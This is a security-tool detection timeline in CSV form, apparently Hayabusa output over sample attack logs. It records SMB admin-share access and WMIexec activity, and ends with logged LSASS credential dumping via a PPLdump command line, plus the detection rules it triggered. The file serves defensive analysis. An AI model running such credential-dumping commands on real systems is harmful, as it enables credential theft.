2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64#\7258b8e8dc26562f4f79202ba192af07  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\37aa83ffa60682e364b3caea876452c9  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe#\504088f50d79f510c3d363ad5a4c58cc  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c#\7b19e9c40f25ea7b5ca13312053ab849  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.240 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b#\d47241c3aea71d38b02fd1cd03c55474  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.256 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.257 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877#\2837fdc670a5c72d64db85e2af347449  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c#\7fac8b827be2ffa333eda4ee3560d8f4  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca#\155b3e5bd15d88ce27d096bd7c40bd33  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded#\991f02d895032e2eca7f6baebab96ddc  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5#\ee4933bf7dcf5304cb565e4f2b833b24  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\71df43fcb7a7745ef38a6ce40ff33c2d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI\16135860bdfd502ca9212ab087e9dd26  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework\0dbd8b9aecffc6cde6bb8aab468084f4  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413#\085b01b1533aaba67cfade21b3bda1a5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Documents  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: USERS\ADMMIG\DESKTOP  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\SMB exec.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\SMB exec.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,high,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\SMB exec.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\SMB exec.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 63565  :  LogonID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 63566  :  LogonID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 63567  :  LogonID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: USERS\ADMMIG\DESKTOP\DESKTOP.INI  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.140 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.179 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: USERS\ADMMIG\DESKTOP  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.195 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: PPLdump.exe  -v lsass lsass.dmp  :  Path: C:\Users\IEUser\Desktop\PPLdump.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\services.exe 652 ""lsass.dmp"" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v  :  Path: C:\Windows\System32\services.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: PPLdump.exe  -v lsass lsass.dmp",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
2021-04-23 07:09:35.165 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
